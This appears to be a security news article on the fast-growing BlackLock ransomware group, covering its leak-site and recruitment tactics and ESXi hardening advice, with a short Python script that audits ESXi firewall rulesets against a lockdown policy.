BlackLock Ransomware: The Fastest-Growing Cyber Threat and How to Stay Safe

Ransomware remains a major problem for businesses, and a new cybercriminal group is expanding at an alarming rate. Security researchers at ReliaQuest have identified BlackLock as the fastest-growing ransomware operation today, with its activity increasing by 1,425% since late 2024. Although it is currently the seventh most active ransomware group, experts predict it could become the biggest threat in 2025.  

Despite law enforcement cracking down on major ransomware gangs like LockBit in 2024, the number of cyberattacks continues to grow. A report from January 31 suggested ransomware incidents had risen by 15% compared to the previous year, while a February 20 study by Symantec showed a slower increase of just 3%. Whatever the exact rate, the takeaway is the same: ransomware remains a serious risk.  


How BlackLock Ransomware Operates  

BlackLock ransomware is designed to infect Windows, Linux, and VMware ESXi systems, making it a versatile and dangerous threat. Cybercriminals behind this operation have developed unique methods to pressure victims into paying ransom quickly.  


1. Blocking access to stolen data  

  • Ransomware groups often leak stolen information on dark web sites to force victims to pay.  
  • BlackLock makes it harder for victims and cybersecurity teams to access leaked data by blocking repeated download attempts.  
  • If someone tries to retrieve files too often, they either receive no response or only see empty files with contact details instead of real data.  
  • This tactic prevents companies from fully understanding what was stolen, increasing the likelihood of paying the ransom.  


2. Recruiting criminals to assist with attacks  

  • BlackLock actively hires "traffers," cybercriminals who help spread ransomware by tricking people into downloading malware.  
  • These traffers guide victims toward fake websites or malicious links that install ransomware.  
  • The group openly recruits low-level hackers on underground forums, while more skilled cybercriminals are privately contacted for higher-level roles.  


Steps to Protect Your Systems  

Security experts recommend taking immediate action to strengthen defenses, especially for companies using VMware ESXi servers. Here are some key steps:  

1. Turn off unnecessary services  

  • Disable unused features like vMotion and SNMP to reduce possible entry points for attackers.  

2. Strengthen security restrictions  

  •  Put VMware ESXi hosts into lockdown mode so they accept management only through vCenter, removing direct SSH, shell, and web-client access as a way for attackers to reach the host.  

3. Limit network access  

  •  Use firewalls and strict access controls to prevent unauthorized users from reaching sensitive systems.  
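Steps 1 to 3 can be checked rather than taken on trust. The audit below is an added example, not ReliaQuest's or VMware's code: it parses the table that esxcli network firewall ruleset list prints on an ESXi host and reports rulesets that should be off on a host managed only through vCenter, together with the esxcli command that turns each one off. The sample output is constructed, and the two policy sets are assumptions to adjust for hosts that really do use vMotion or iSCSI.

```python
"""Audit ESXi firewall rulesets against the hardening steps above.

Added example (not ReliaQuest's or VMware's code). Parses the output of
`esxcli network firewall ruleset list`; the sample below is constructed in that
shape, and EXPECTED_DISABLED / REQUIRED_ENABLED are an assumed policy.
"""
from __future__ import annotations

# Rulesets a host managed through vCenter does not usually need (assumed policy).
EXPECTED_DISABLED = {"snmp", "vMotion", "sshServer", "sshClient", "nfsClient", "iSCSI"}
# Rulesets vCenter management itself depends on.
REQUIRED_ENABLED = {"vpxHeartbeats", "vSphereClient"}

# Constructed sample in the two-column layout esxcli prints.
SAMPLE_RULESET_LIST = """\
Name                         Enabled
---------------------------  -------
sshServer                    true
sshClient                    false
nfsClient                    false
dhcp                         true
dns                          true
snmp                         true
ntpClient                    true
vpxHeartbeats                true
webAccess                    true
vMotion                      true
vSphereClient                true
iSCSI                        false
"""


def parse_ruleset_list(text: str) -> dict[str, bool]:
    """Map ruleset name -> enabled, skipping the header and separator rows."""
    rulesets = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 2 or parts[1] not in ("true", "false"):
            continue
        rulesets[parts[0]] = parts[1] == "true"
    return rulesets


def audit(rulesets: dict[str, bool]) -> list[tuple[str, str, str]]:
    """Return (ruleset, problem, remediation command) for each policy violation."""
    findings = []
    for name in sorted(EXPECTED_DISABLED):
        if rulesets.get(name, False):
            findings.append((name, "enabled but not needed",
                             f"esxcli network firewall ruleset set --ruleset-id={name} --enabled=false"))
    for name in sorted(REQUIRED_ENABLED):
        if not rulesets.get(name, False):
            findings.append((name, "disabled but required for vCenter management",
                             f"esxcli network firewall ruleset set --ruleset-id={name} --enabled=true"))
    return findings


def audit_text(text: str = SAMPLE_RULESET_LIST) -> list[tuple[str, str, str]]:
    return audit(parse_ruleset_list(text))


if __name__ == "__main__":
    for name, problem, fix in audit_text():
        print(f"{name}: {problem}\n    {fix}")
```

On the sample it reports snmp, sshServer and vMotion as enabled but not needed. Closing the firewall ruleset is only half of step 1: stop the underlying service as well (the SNMP agent via esxcli system snmp set --enable false, SSH from the host services list), and verify lockdown mode separately in vCenter, since it is not visible in this table.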

Additional recommendations include:  

1. Activating multi-factor authentication (MFA) to prevent unauthorized logins.  

2. Disabling Remote Desktop Protocol (RDP) on systems that do not need remote access.  

The rapid rise of BlackLock ransomware shows that cybercriminals are constantly developing new strategies to pressure victims and avoid detection. Organizations must take proactive steps to secure their networks and stay informed about emerging threats. Implementing strong security controls today can prevent costly cyberattacks in the future.